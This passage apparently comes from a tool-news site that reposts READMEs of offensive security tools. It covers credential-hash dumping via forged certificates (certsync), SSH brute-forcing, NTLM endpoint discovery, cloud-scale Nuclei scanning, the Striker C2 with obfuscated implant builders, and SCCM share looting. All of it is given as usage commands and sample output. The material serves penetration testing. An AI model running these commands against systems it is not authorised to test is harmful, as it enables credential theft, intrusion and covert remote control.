s%2FF%2FPli4oxRKfgI7FhAaC%2Fu1DopZ6vvBdUq1pBQE66fQ9SnxRTmIClCpULUhNO90ULTpUi9ga2UtBCTzI8z6Sb6qyQ52NopNZMFdrn9orzdP8oqFeyYpF%2BQEtbp%2F5AMENkFkWUxHZn8NoSlO8P6G6ubSyDdY4QJPaFS4FxNhhm85WlZC9xfEZ1AGSSBOu9JJVYiKxXnL1yYLqrlWp5mfBHZeUBwEa%2FMjGxZEVYDhXo4PiU0jxN7fYmjaobp3DSgA5H3BcFuNG5d8CUnOlQcEie5b%2BUHOpI9zAk7qcuEUXbaZ5Mvh0t2jXCRALRKYDyBdbHlWAFo10dTIM6L3aSTM5uEz9%2FalXLXoWlMo7dTDpuO5bBfTq7YkoPExL3g3JJX47UhuLq85i3%2Bzxfvd7r%2Fmid69kbD3PnX%2Bj0QxaiShhyOZg6jl1HMeRRXvZap3FPCIfxbCf7j2TRqB5gYefBIIdGYjrdiL6HS8SbjXcROMwh2Fxnt505X4jmkmDcGmneU3z%2B84TSSFewcSpxGEGvHVkkU4OaT6vyFwsxCmdrR187tQZ7gn3ZkAiTps%2FfOPcL5QWXja06Z%2FHT3zboq6Hj9v9NBHzpC1eAK0YN8r4V2UMI3P0%2FsIPQYXhovoeLjJwq6snKZTX37ulE1mbS1uOY%2BZrvFYbLN5DdNL%2B%2Bl%2F%2BcWIpc0RSYBLo19xHpKeoeLjU2sxaYzK%2B92D4zKANdPPvsHPqJD1Y%2FBwCL%2FfZKaJfRK9Bj09ez1Z1ixTEKjIRCwuxijnJGq33faZchbwpMPpTfv43jEriGwXwoqOo9Mbj9ggPAil7O81XZxNT4vv4RoxXTN93V100rt3ClXauL%2BlNID%2BseN2CEZZqnygpTDf2an%2FVsmJGJJcc0goW3l43mhx2U79zeuT94cFPGpvITEbMtjmuNsUbOBuw6nqm5rAs%2FxjIsDRqfQ xGQWfS0kuwuU6RRmiME2Ps0NrBENIbZzcbgw6%2BRIwClWkvEG%2BK%2FPdcAdfmRkAPWUNadxnhjeU2jNnzI1yYNIOhziUBPxgFEcAT45E7rWvf8ghT08HZvphzytPmD%2FxuvJaDdRgb6a30TjSpa7i%2BEHkIMxM5eH1kiwhN6xkTcBsJ87epGdFRWKhTGKYwCbaYid1nRs7%2BvQEU7MRYghok8KMTueELipohm3otuKo8V4a7w4TgTSBvPE%2BLPLJRwhM8KcjGlcpzF1NowRo6zeJJhbdPpouUH2NJzDcp7P4uUuUB9Cxt9B986My6zDnz1eyBvRMzj7TABfmfPFPoY3RfzBUzDm%2FA9lOGsM6d9WZj2CH0WxqiLDGmP1Ts9DWX%2FsYyqEGK5R1Xpnp7kRIarPtYliecp50ZIH6nqSkoCBllMCCE6JN%2BdoXobTpulALdmQV0%2Bppv%2FAjzIJrTHgX7jwRGEAeRgAxTomtemmIaH5NtV7xt8XS%2BqwghdJl1D06%2FWhpMtJ1%2FoQGoJ0%2F7ChYyefyAfsiQNWsO66UNVyl71RVPwATnbRO5K5mtxn0M2wuXXpAARNh6pQTcVX%2FTJ4jmosyKwhI6I870NEOsSaWlKVyOdb97C3Bt0pvzq8BagV5FMsNtJKmqIIM0HRkMkalIyfow9iS%2B5xGN5eKM8NE4E6hO4CvmpG%2BH2xFHTSNzloV0FjLdDmj5UfMjhUuEb3rkKK1bGAVaaherp6Ai6N4YJQzh%2FDdpo6al95EZN2OYolzxitgDgsWVGhMvddyQTwnRqRY04hdVJTwdhi4TiCPbLJ1Wcty2ozy6VDs4w77EOAQ5JnxUmDVPA3vXmADJZR0hIJEsuxXfYg%2BRIdV4fzGunV4%2B9jpiyM9G11iiesURK82o%2BdcG7FaCkkun2K2bvD6qGcL61uhoxNeLVpAxjrRjaEBrXsexZ9rExpMlFD8e3 NM%2B0K0LQJvdEvpWYS5UTG9cAbNAzBs%3DpDsPXFGf2lEMcyGaK1ouARHUfqU0fzkeVwjXU9ORI%2Fs%3D",
"dUEvRldLekFNcklGZ3ZSbU1XaHJ0ZGxsLzhYTHlNTW43T3BVN05kZXE3WUhQOVVKbVA3Rm5WaSs5eG5QQ1VIRVBzeDFNTnNpZ0xCM1FKbzFZTEJISzhaNzFmVGYzME0waDFURVpCYm5TQlJFRmRFclYzNUZhR3VuN29PMmlkVHBrRi8wb3AwZWgvWmxObkFOYnpkeHR1YWpWZ3lnN0Y4ZW9xSk9LNVlQd0U4MmFsbWtLZUI5VzkzRk M4YXBFWXBWLS15L00xME1nVFp2ZTlmUWcxZVlpelpnPT0=--7efe7919a5210cfd1ac4c6228e3ff82c0600d841",

for test in tests:
r = check_all_modules(test)
if r:
print("Key not found!")

Carve all modules at once

import requests
from badsecrets.base import carve_all_modules

### using python requests response object

res = requests.get(f"")
r_list = carve_all_modules(requests_response=res)

### Using string

carve_source_text = """
<p>Some text</p>
<div class="JWT_IN_PAGE">

r_list = carve_all_modules(body=carve_source_text)


Nothing would make us happier than getting a pull request with a new module! But the easiest way to contribute would be helping to populate our word lists! If you find publicly available keys help us make Badsecrets more useful by submitting a pull request to add them.

Requests for modules are always very welcome as well!

Planned Modules

  • Laravel
  • Express

Certsync - Dump NTDS With Golden Certificates And UnPAC The Hash

By: Zion3R

certsync is a new technique in order to dump NTDS remotely, but this time without DRSUAPI: it uses golden certificate and UnPAC the hash. It works in several steps:

  1. Dump user list, CA informations and CRL from LDAP
  2. Dump CA certificate and private key
  3. Forge offline a certificate for every user
  4. UnPAC the hash for every user in order to get nt and lm hashes
$ certsync -u khal.drogo -p 'horse' -d essos.local -dc-ip -ns
[*] Collecting userlist, CA info and CRL on LDAP
[*] Found 13 users in LDAP
[*] Found CA ESSOS-CA on braavos.essos.local(
[*] Dumping CA certificate and private key
[*] Forging certificates for every users. This can take some time...
[*] PKINIT + UnPAC the hashes
ESSOS.LOCAL/khal.drogo:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb 5c9d37021:::

Contrary to what we may think, the attack is not at all slower.


git clone
cd certsync
pip install .


pip install certsync


$ certsync -h
usage: certsync [-h] [-debug] [-outputfile OUTPUTFILE] [-ca-pfx pfx/p12 file name] [-ca-ip ip address] [-d domain.local] [-u username] [-p password] [-hashes LMHASH:NTHASH]
[-no-pass] [-k] [-aesKey hex key] [-use-kcache] [-kdcHost KDCHOST] [-scheme ldap scheme] [-ns nameserver] [-dns-tcp] [-dc-ip ip address]
[-ldap-filter LDAP_FILTER] [-template cert.pfx] [-timeout timeout] [-jitter jitter] [-randomize]

Dump NTDS with golden certificates and PKINIT

-h, --help show this help message and exit
-debug Turn DEBUG output ON
-outputfile OUTPUTFILE
base output filename

CA options:
-ca-pfx pfx/p12 file name
Path to CA certificate
-ca-ip ip address IP Address of the certificate authority. If omitted it will use the domainpart (FQDN) specified in LDAP

authenticati on options:
-d domain.local, -domain domain.local
Domain name
-u username, -username username
-p password, -password password
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it
will use the ones specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-use-kcache Use Kerberos authe ntication from ccache file (KRB5CCNAME)
-kdcHost KDCHOST FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter

connection options:
-scheme ldap scheme
-ns nameserver Nameserver for DNS resolution
-dns-tcp Use TCP instead of UDP for DNS queries
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter

OPSEC options:
-ldap-filter LDAP_FILTER
ldap filter to dump users. Default is (&(|(objectCategory=person)(objectClass=computer))(objectClass=user))
-template cert.pfx base template to use in order to forge certificates
-timeout timeout Timeout between PKINIT connection
-jitter jitter Jitter between PKINIT connecti on
-randomize Randomize certificate generation. Takes longer to generate all the certificates


DSRUAPI is more and more monitored and sometimes retricted by EDR solutions. Moreover, certsync does not require to use a Domain Administrator, it only require a CA Administrator.


This attack needs:

  • A configured Entreprise CA on an ADCS server in the domain,
  • PKINIT working,
  • An domain account which is local administrator on the ADCS server, or an export of the CA certificate and private key.


Since we cannot PKINIT for users that are revoked, we cannot dump thier hashes.


Some options were added to customize the behaviour of the tool:

  • -ldap-filter: change the LDAP filter used to select usernames to certsync.
  • -template: use an already delivered certificate to mimic it when forging users certificates.
  • -timeout and -jitter: change timeout between PKINIT authentication requests.
  • -randomize: By default, every forged user certificates will have the same private key, serial number and validity dates. This parameter will randomize them, but the forging will take longer.


Cbrutekrag - Penetration Tests On SSH Servers Using Brute Force Or Dictionary Attacks. Written In C

By: Zion3R

Penetration tests on SSH servers using dictionary attacks. Written in C.

brute krag means "brute force" in afrikรกans


This tool is for ethical testing purpose only.
cbrutekrag and its owners can't be held responsible for misuse by users.
Users have to act as permitted by local law rules.



cbrutekrag uses libssh - The SSH Library (



  • make
  • gcc compiler
  • libssh-dev
git clone --depth=1
cd cbrutekrag
make install

Static build


  • cmake
  • gcc compiler
  • make
  • libssl-dev
  • libz-dev
git clone --depth=1
cd cbrutekrag
make install


OpenSSH Brute force tool 0.5.0 __/ | (c) Copyright 2014-2022 Jorge Matricali |___/ usage: ./cbrutekrag [-h] [-v] [-aA] [-D] [-P] [-T TARGETS.lst] [-C combinations.lst] [-t THREADS] [-o OUTPUT.txt] [TARGETS...] -h This help -v Verbose mode -V Verbose mode (sshlib) -s Scan mode -D Dry run -P Progress bar -T <targets> Targets file -C <combinations> Username and password file -t <threads> Max threads -o <output> Output log file -a Accepts non OpenSSH servers -A Allow servers detected as honeypots." dir="auto">
$ cbrutekrag -h
_ _ _
| | | | | |
___ | |__ _ __ _ _| |_ ___| | ___ __ __ _ __ _
/ __|| '_ \| '__| | | | __/ _ \ |/ / '__/ _` |/ _` |
| (__ | |_) | | | |_| | || __/ <| | | (_| | (_| |
\___||_.__/|_| \__,_|\__\___|_|\_\_| \__,_|\__, |
OpenSSH Brute force tool 0.5.0 __/ |
(c) Copyright 2014-2022 Jorge Matricali |___/

usage: ./cbrutekrag [-h] [-v] [-aA] [-D] [-P] [-T TARGETS.lst] [-C combinations.lst]
[-t THREADS] [-o OUTPUT.txt] [TARGETS...]

-h This help
-v Verbose mode
-V Verbose mode (sshlib)
-s Scan mode
-D Dry run
-P Progress bar
-T <targets> Targets file
-C <combinations> Username and password file -t <threads> Max threads
-o <output> Output log file
-a Accepts non OpenSSH servers
-A Allow servers detected as honeypots.

Example usages

cbrutekrag -T targets.txt -C combinations.txt -o result.log
cbrutekrag -s -t 8 -C combinations.txt -o result.log

Supported targets syntax


Combinations file format

root root
root password

NTLMRecon - A Tool For Performing Light Brute-Forcing Of HTTP Servers To Identify Commonly Accessible NTLM Authentication Endpoints

By: Zion3R

NTLMRecon is a Golang version of the original NTLMRecon utility written by Sachin Kamath (AKA pwnfoo). NTLMRecon can be leveraged to perform brute forcing against a targeted webserver to identify common application endpoints supporting NTLM authentication. This includes endpoints such as the Exchange Web Services endpoint which can often be leveraged to bypass multi-factor authentication.

The tool supports collecting metadata from the exposed NTLM authentication endpoints including information on the computer name, Active Directory domain name, and Active Directory forest name. This information can be obtained without prior authentication by sending an NTLM NEGOTIATE_MESSAGE packet to the server and examining the NTLM CHALLENGE_MESSAGE returned by the targeted server. We have also published a blog post alongside this tool discussing some of the motiviations behind it's development and how we are approaching more advanced metadata collectoin within Chariot.

Why build a new version of this capability?

We wanted to perform brute-forcing and automated identification of exposed NTLM authentication endpoints within Chariot, our external attack surface management and continuous automated red teaming platform. Our primary backend scanning infrastructure is written in Golang and we didn't want to have to download and shell out to the NTLMRecon utility in Python to collect this information. We also wanted more control over the level of detail of the information we collected, etc.


The following command can be leveraged to install the NTLMRecon utility. Alternatively, you may download a precompiled version of the binary from the releases tab in GitHub.

go install


The following command can be leveraged to invoke the NTLM recon utility and discover exposed NTLM authentication endpoints:

NTLMRecon -t

The following command can be leveraged to invoke the NTLM recon utility and discover exposed NTLM endpoints while outputting collected metadata in a JSON format:

NTLMRecon -t -o json

Example JSON Output

Below is an example JSON output with the data we collect from the NTLM CHALLENGE_MESSAGE returned by the server:

"url": "",
"ntlm": {
"netbiosComputerName": "MSEXCH1",
"netbiosDomainName": "CONTOSO",
"dnsDomainName": "na.contoso.local",
"dnsComputerName": "",
"forestName": "contoso.local"
โžœ  ~ NTLMRecon -t -o json | jq
"url": "",
"ntlm": {
"netbiosComputerName": "MSFED1",
"netbiosDomainName": "CONTOSO",
"dnsDomainName": "",
"dnsComputerName": "",
"forestName": ""
โžœ ~ NTLMRecon -t
โžœ ~

Potential Additional Features

Our methodology when developing this tool has targeted the most barebones version of the desired capability for the initial release. The goal for this project was to create an initial tool we could integrate into Chariot and then allow community contributions and feedback to drive additional tooling improvements or functionality. Below are some ideas for additional functionality which could be added to NTLMRecon:

  • Concurrency and Performance Improvements: There could be some additional improvements to concurrency and performance. Currently, the tool sequentially makes HTTP requests and waits for the previous request to be performed.
  • Batch Scanning Functionality: Another idea would be to extend the NTLMRecon utility to accept a list of hosts from standard input. One usage scenario for this could be an attacker running a combination of โ€œsubfinder | httpx | NTLMReconโ€ to enumerate HTTP servers and then identify NTLM authentication endpoints that are exposed externally across an entire attack surface.
  • One-off Data Collection Capability: A user may wish to perform one-off data collection targeting a specific endpoint which is currently not supported by NTLMRecon.
  • User-Agent Randomization or Control: A user may wish to randomize the user-agents used to make requests. Alternatively when targeting Microsoft Exchange servers sometimes using a user-agent with a mobile client or legacy third-party email client can allow requests to the /EWS/Exchange.asmx endpoint through, etc.



Nuclearpond - A Utility Leveraging Nuclei To Perform Internet Wide Scans For The Cost Of A Cup Of Coffee

Nuclear Pond is used to leverage Nuclei in the cloud with unremarkable speed, flexibility, and perform internet wide scans for far less than a cup of coffee.

It leverages AWS Lambda as a backend to invoke Nuclei scans in parallel, choice of storing json findings in s3 to query with AWS Athena, and is easily one of the cheapest ways you can execute scans in the cloud.


  • Output results to your terminal, json, or to S3
  • Specify threads and parallel invocations in any desired number of batches
  • Specify any Nuclei arguments just like you would locally
  • Specify a single host or from a file
  • Run the http server to take scans from the API
  • Run the http server to get status of the scans
  • Query findings through Athena for searching S3
  • Specify a custom nuclei and reporting configurations


Think of Nuclear Pond as just a way for you to run Nuclei in the cloud. You can use it just as you would on your local machine but run them in parallel and with however many hosts you want to specify. All you need to think of is the nuclei command line flags you wish to pass to it.

Setup & Installation

To install Nuclear Pond, you need to configure the backend terraform module. You can do this by running terraform apply or by leveraging terragrunt.

$ go install

Environment Variables

You can either pass in your backend with flags or through environment variables. You can use -f or --function-name to specify your Lambda function and -r or --region to the specified region. Below are environment variables you can use.

  • AWS_LAMBDA_FUNCTION_NAME is the name of your lambda function to execute the scans on
  • AWS_REGION is the region your resources are deployed
  • NUCLEARPOND_API_KEY is the API key for authenticating to the API
  • AWS_DYNAMODB_TABLE is the dynamodb table to store API scan states

Command line flags

Below are some of the flags you can specify when running nuclearpond. The primary flags you need are -t or -l for your target(s), -a for the nuclei args, and -o to specify your output. When specifying Nuclei args you must pass them in as base64 encoded strings by performing -a $(echo -ne "-t dns" | base64).


Below are the subcommands you can execute within nuclearpond.

  • run: Execute nuclei scans
  • service: Basic API to execute nuclei scans


To run nuclearpond subcommand nuclearpond run -t -r us-east-1 -f jwalker-nuclei-runner-function -a $(echo -ne "-t dns" | base64) -o cmd -b 1 in which the target is, region is us-east-1, lambda function name is jwalker-nuclei-runner-function, nuclei arguments are -t dns, output is cmd, and executes one function through a batch of one host through -b 1.

$ nuclearpond run -h
Executes nuclei tasks in parallel by invoking lambda asynchronously

nuclearpond run [flags]

-a, --args string nuclei arguments as base64 encoded string
-b, --batch-size int batch size for number of targets per execution (default 1)
-f, --function-name string AWS Lambda function name
-h, --help help for run
-o, --output string output type to save nuclei results(s3, cmd, or json) (default "cmd")
-r, --region string AWS region to run nuclei
-s, --silent silent command line output
-t, --target string individual target to specify
-l, --targets string list of targets in a file
-c, --threads int number of threads to run lambda funct ions, default is 1 which will be slow (default 1)

Custom Templates

The terraform module by default downloads the templates on execution as well as adds the templates as a layer. The variables to download templates use the terraform github provider to download the release zip. The folder name within the zip will be located within /opt. Since Nuclei downloads them on run we do not have to but to improve performance you can specify -t /opt/nuclei-templates-9.3.4/dns to execute templates from the downloaded zip. To specify your own templates you must reference a release. When doing so on your own repository you must specify these variables in the terraf orm module, github_token is not required if your repository is public.

  • github_repository
  • github_owner
  • release_tag
  • github_token

Retrieving Findings

If you have specified s3 as the output, your findings will be located in S3. The fastest way to get at them is to do so with Athena. Assuming you setup the terraform-module as your backend, all you need to do is query them directly through athena. You may have to configure query results if you have not done so already.

limit 10;

Advance Query

In order to get down into queries a little deeper, I thought I would give you a quick example. In the select statement we drill down into info column, "matched-at" column must be in double quotes due to - character, and you are searching only for high and critical findings generated by Nuclei.

host like ''
and info.severity in ('high','critical')


The backend infrastructure, all within terraform module. I would strongly recommend reading the readme associated to it as it will have some important notes.

  • Lambda function
  • S3 bucket
    • Stores nuclei binary
    • Stores configuration files
    • Stores findings
  • Glue Database and Table
    • Allows you to query the findings in S3
    • Partitioned by the hour
    • Partition projection
  • IAM Role for Lambda Function

Striker - A Command And Control (C2)

Striker is a simple Command and Control (C2) program.


This project is under active development. Most of the features are experimental, with more to come. Expect breaking changes.


A) Agents

  • Native agents for linux and windows hosts.
  • Self-contained, minimal python agent should you ever need it.
  • HTTP(s) channels.
  • Aynchronous tasks execution.
  • Support for multiple redirectors, and can fallback to others when active one goes down.

B) Backend / Teamserver

  • Supports multiple operators.
  • Most features exposed through the REST API, making it easy to automate things.
  • Uses web sockets for faster comms.

C) User Interface

  • Smooth and reactive UI thanks to Svelte and SocketIO.
  • Easy to configure as it compiles into static HTML, JavaScript, and CSS files, which can be hosted with even the most basic web server you can find.
  • Teamchat feature to communicate with other operators over text.

Installing Striker

Clone the repo;

$ git clone
$ cd Striker

The codebase is divided into 4 independent sections;

1. The C2 Server / Backend

This handles all server-side logic for both operators and agents. It is a NodeJS application made with;

  • express - For the REST API.
  • - For Web Socket communtication.
  • mongoose - For connecting to MongoDB.
  • multer - For handling file uploads.
  • bcrypt - For hashing user passwords.

The source code is in the backend/ directory. To setup the server;

  1. Setup a MongoDB database;

Striker uses MongoDB as backend database to store all important data. You can install this locally on your machine using this guide for debian-based distros, or create a free one with MongoDB Atlas (A database-as-a-service platform).

  1. Move into the source directory;
$ cd backend
  1. Install dependencies;
$ npm install
  1. Create a directory for static files;
$ mkdir static

You can use this folder to host static files on the server. This should also be where your UPLOAD_LOCATION is set to in the .env file (more on this later), but this is not necessary. Files in this directory will be publicly accessible under the path /static/.

  1. Create a .env file;

NOTE: Values between < and > are placeholders. Replace them with appropriate values (including the <>). For fields that require random strings, you can generate them easily using;

$ head -c 100 /dev/urandom | sha256sum
DB_URL=<your MongoDB connection URL>
HOST=<host to listen on (default:>
PORT=<port to listen on (default: 3000)>
SECRET=<random string to use for signing session cookies and encrypting session data>
ORIGIN_URL=<full URL of the server you will be hosting the frontend at. Used to setup CORS>
REGISTRATION_KEY=<random string to use for authentication during signup>
MAX_UPLOAD_SIZE=<max file upload size, in bytes>
UPLOAD_LOCATION=<directory to store uploaded files to (default: static)>
SSL_KEY=<your SSL key file (optional)>
SSL_CERT=<your SSL cert file (optional)>

Note that SSL_KEY and SSL_CERT are optional. If any is not defined, a plain HTTP server will be created. This helps avoid needless overhead when running the server behind an SSL-enabled reverse proxy on the same host.

  1. Start the server;
$ node index.js
[12:45:30 PM] Connecting to backend database...
[12:45:31 PM] Starting HTTP server...
[12:45:31 PM] Server started on port: 3000

2. The Frontend

This is the web UI used by operators. It is a single page web application written in Svelte, and the source code is in the frontend/ directory.

To setup the frontend;

  1. Move into the source directory;
$ cd frontend
  1. Install dependencies;
$ npm install
  1. Create a .env file with the variable VITE_STRIKER_API set to the full URL of the C2 server as configured above;
  1. Build;
$ npm run build

The above will compile everything into a static web application in dist/ directory. You can move all the files inside into the web root of your web server, or even host it with a basic HTTP server like that of python;

$ cd dist
$ python3 -m http.server 8000
  1. Signup;
  • Open the site in a web browser. You should see a login page.
  • Click on the Register button.
  • Enter a username, password, and the registration key in use (see REGISTRATION_KEY in backend/.env)

This will create a standard user account. You will need an admin account to access some features. Your first admin account must be created manually, afterwards you can upgrade and downgrade other accounts in the Users tab of the web UI.

To create your first admin account;

  • Connect to the MongoDB database used by the backend.
  • Update the users collection and set the admin field of the target user to true;

There are different ways you can do this. If you have mongo available in you CLI, you can do it using;

$ mongo <your MongoDB connection URL>
> db.users.updateOne({username: "<your username>"}, {$set: {admin: true}})

You should get the following response if it works;

{ "acknowledged" : true, "matchedCount" : 1, "modifiedCount" : 1 }

You can now login :)

3. The C2 Redirector

A) Dumb Pipe Redirection

A dumb pipe redirector written for Striker is available at redirector/ Obviously, this will only work for plain HTTP traffic, or for HTTPS when SSL verification is disabled (you can do this by enabling the INSECURE_SSL macro in the C agent).

The following example listens on port 443 on all interfaces and forward to on port 443;

$ cd redirector
$ ./
[*] Starting redirector on
[+] Listening for connections...

B) Nginx Reverse Proxy as Redirector

  1. Install Nginx;
$ sudo apt install nginx
  1. Create a vhost config (e.g: /etc/nginx/sites-available/striker);


  • <domain-name> - This is your server's FQDN, and should match the one in you SSL cert.
  • <ssl-cert> - The SSL cert file to use.
  • <ssl-key> - The SSL key file to use.
  • <c2-server> - The full URL of the C2 server to forward requests to.

WARNING: client_max_body_size should be as large as the size defined by MAX_UPLOAD_SIZE in your backend/.env file, or uploads for large files will fail.

server {
listen 443 ssl;
server_name <domain-name>;
ssl_certificate <ssl-cert>;
ssl_certificate_key <ssl-key>;
client_max_body_size 100M;
access_log /var/log/nginx/striker.log;

location / {
proxy_pass <c2-server>;
proxy_redirect off;
proxy_ssl_verify off;
proxy_read_timeout 90;
proxy_http_version 1.0;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
  1. Enable it;
$ sudo ln -s /etc/nginx/sites-available/striker /etc/nginx/sites-enabled/striker
  1. Restart Nginx;
$ sudo service nginx restart

Your redirector should now be up and running on port 443, and can be tested using (assuming your FQDN is striker.local);

$ curl https://striker.local

If it works, you should get the 404 response used by the backend, like;

{"error":"Invalid route!"}

4. The Agents (Implants)

A) The C Agent

These are the implants used by Striker. The primary agent is written in C, and is located in agent/C/. It supports both linux and windows hosts. The linux agent depends externally on libcurl, which you will find installed in most systems.

The windows agent does not have an external dependency. It uses wininet for comms, which I believe is available on all windows hosts.

  1. Building for linux

Assuming you're on a 64 bit host, the following will build for 64 host;

$ cd agent/C
$ mkdir bin
$ make

To build for 32 bit on 64;

$ sudo apt install gcc-multilib
$ make arch=32

The above compiles everything into the bin/ directory. You will need only two files to generate working implants;

  • bin/stub - This is the agent stub that will be used as template to generate working implants.
  • bin/builder - This is what you will use to patch the agent stub to generate working implants.

The builder accepts the following arguments;

$ ./bin/builder 
[-] Usage: ./bin/builder <url> <auth_key> <delay> <stub> <outfile>


  • <url> - The server to report to. This should ideally be a redirector, but a direct URL to the server will also work.
  • <auth_key> - The authentication key to use when connecting to the C2. You can create this in the auth keys tab of the web UI.
  • <delay> - Delay between each callback, in seconds. This should be at least 2, depending on how noisy you want it to be.
  • <stub> - The stub file to read, bin/stub in this case.
  • <outfile> - The output filename of the new implant.


$ ./bin/builder https://localhost:3000 979a9d5ace15653f8ffa9704611612fc 5 bin/stub bin/striker
[*] Obfuscating strings...
[+] 69 strings obfuscated :)
[*] Finding offsets of our markers...
[+] Offsets:
URL: 0x0000a2e0
OBFS Key: 0x0000a280
Auth Key: 0x0000a2a0
Delay: 0x0000a260
[*] Patching...
[+] Operation completed!
  1. Building for windows

You will need MinGW for this. The following will install the 32 and 64 bit dev windows environment;

$ sudo apt install mingw-w64

Build for 64 bit;

$ cd agent/C
$ mdkir bin
$ make target=win

To compile for 32 bit;

$ make target=win arch=32

This will compile everything into the bin/ directory, and you will have the builder and the stub as bin\stub.exe and bin\builder.exe, respectively.

B) The Python Agent

Striker also comes with a self-contained python agent (tested on python 2.7.16 and 3.7.3). This is located at agent/python/. Only the most basic features are implemented in this agent. Useful for hosts that can't run the C agent but have python installed.

There are 2 file in this directory;

  • - This is the payload stub to pass to the builder.
  • - This is what you'll be using to generate an implant.

Usage example:

$ ./
[-] Usage: <url> <auth_key> <delay> <stub> <outfile>
# The following will generate a working payload as ``
$ ./ http://localhost:3000 979a9d5ace15653f8ffa9704611612fc 2
[*] Loading agent stub...
[*] Writing configs...
[+] Agent built successfully:
# Run it
$ python3

Getting Started

After following the above instructions, Striker should now be ready for use. Kindly go through the usage guide. Have fun, and happy hacking!


If you like the project, consider helping me turn coffee into code!

CMLoot - Find Interesting Files Stored On (System Center) Configuration Manager (SCCM/CM) SMB Shares

CMLoot was created to easily find interesting files stored on System Center Configuration Manager (SCCM/CM) SMB shares. The shares are used for distributing software to Windows clients in Windows enterprise environments and can contains scripts/configuration files with passwords, certificates (pfx), etc. Most SCCM deployments are configured to allow all users to read the files on the shares, sometimes it is limited to computer accounts.

The Content Library of SCCM/CM have a "complex" (annoying) file structure which CMLoot will untangle for you:

Essentially the DataLib folder contains .INI files, the .INI file are named the original filename + .INI. The .INI file contains a hash of the file, and the file itself is stored in the FileLib in format of <folder name: 4 first chars of the hash>\fullhash.

CM Access Accounts

It is possible to apply Access control to packages in CM. This however only protects the folder for the file descriptor (DataLib), not the actual file itself. CMLoot will during inventory record any package that it can't access (Access denied) to the file _noaccess.txt. Invoke-CMLootHunt can then use this file to enumerate the actual files that the access control is trying to protect.


Windows Defender for Endpoint (EDR) or other security mechanisms might trigger because the script parses a lot of files over SMB.


Find CM servers by searching for them in Active Directory or by fetching this reqistry key on a workstation with System Center installed:

(Get-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\SMS\DP -Name ManagementPoints).ManagementPoints

There may be multiple CM servers deployed and they can contain different files so be sure to find all of them.

Then you need to create an inventory file which is just a text file containing references to file descriptors (.INI). The following command will parse all .INI files on the SCCM server to create a list of files available.

PS> Invoke-CMLootInventory -SCCMHost sccm01.domain.local -Outfile sccmfiles.txt

Then use the inventory file created above to download files of interest:

Select files using GridView (Milage may vary with large inventory files):

PS> Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -GridSelect

Download a single file, by coping a line in the inventory text:

PS> Invoke-CMLootDownload -SingleFile \\sccm\SCCMContentLib$\DataLib\SC100001.1\x86\MigApp.xml

Download all files with a certain file extension:

PS> Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -Extension ps1

Files will by default download to CMLootOut in the folder from which you execute the script, can be changed with -OutFolder parameter. Files are saved in the format of (folder: filext)\(first 4 chars of hash>_original filename).

Hunt for files that CMLootInventory found inaccessible:

Invoke-CMLootHunt -SCCMHost sccm -NoAccessFile sccmfiles_noaccess.txt

Bulk extract MSI files:

Invoke-CMLootExtract -Path .\CMLootOut\msi


Run inventory, scanning available files:

Select files using GridSelect:

Download all extensions:

Hunt "inaccessible" files and MSI extract:


Tomas Rzepka / WithSecure

Fingerprintx - Standalone Utility For Service Discovery On Open Ports!

fingerprintx is a utility similar to httpx that also supports fingerprinting services like as RDP, SSH, MySQL, PostgreSQL, Kafka, etc. fingerprintx can be used alongside port scanners like Naabu to fingerprint a set of ports identified during a port scan. For example, an engineer may wish to scan an IP range and then rapidly fingerprint the service running on all the discovered ports.


  • Fast fingerprinting of exposed services
  • Application layer service discovery
  • Plays nicely with other command line tools
  • Automatic metadata collection from identified services

Supported Protocols:



From Github

go install

From source (go version > 1.18)

$ git clone
$ cd fingerprintx

# with go version > 1.18
$ go build ./cmd/fingerprintx
$ ./fingerprintx -h


$ git clone
$ cd fingerprintx

# build
docker build -t fingerprintx .

# and run it
docker run --rm fingerprintx -h
docker run --rm fingerprintx -t --json


fingerprintx -h

The -h option will display all of the supported flags for fingerprintx.

fingerprintx [flags]
Requires a host and port number or ip and port number. The port is assumed to be open.
fingerprintx -t
fingerprintx -l input-file.txt
fingerprintx --json -t,

--csv output format in csv
-f, --fast fast mode
-h, --help help for fingerprintx
--json output format in json
-l, --list string input file containing targets
-o, --output string output file
-t, --targets strings target or comma separated target list
-w, --timeout int timeout (milliseconds) (default 500)
-U, --udp run UDP plugins
-v, --verbose verbose mode

The fast mode will only attempt to fingerprint the default service associated with that port for each target. For example, if is the input, only the https plugin would be run. If https is not running on, there will be NO output. Why do this? It's a quick way to fingerprint most of the services in a large list of hosts (think the 80/20 rule).

Running Fingerprintx

With one target:

$ fingerprintx -t

By default, the output is in the form: SERVICE://HOST:PORT. To get more detailed service output specify JSON with the --json flag:

$ fingerprintx -t --json
{"ip":"","port":8000,"service":"http","transport":"tcp","metadata":{"responseHeaders":{"Content-Length":["1154"],"Content-Type":["text/html; charset=utf-8"],"Date":["Mon, 19 Sep 2022 18:23:18 GMT"],"Server":["SimpleHTTP/0.6 Python/3.10.6"]},"status":"200 OK","statusCode":200,"version":"SimpleHTTP/0.6 Python/3.10.6"}}

Pipe in output from another program (like naabu):

$ naabu -silent 2>/dev/null | fingerprintx

Run with an input file:

$ cat input.txt | fingerprintx

# or if you prefer
$ fingerprintx -l input.txt

With more metadata output:

Why Not Nmap?

Nmap is the standard for network scanning. Why use fingerprintx instead of nmap? The main two reasons are:

  • fingerprintx works smarter, not harder: the first plugin run against a server with port 8080 open is the http plugin. The default service approach cuts down scanning time in the best case. Most of the time the services running on port 80, 443, 22 are http, https, and ssh -- so that's what fingerprintx checks first.
  • fingerprintx supports json output with the --json flag. Nmap supports numerous output options (normal, xml, grep), but they are often hard to parse and script appropriately. fingerprintx supports json output which eases integration with other tools in processing pipelines.


  • Why do you have a third_party folder that imports the Go cryptography libraries?
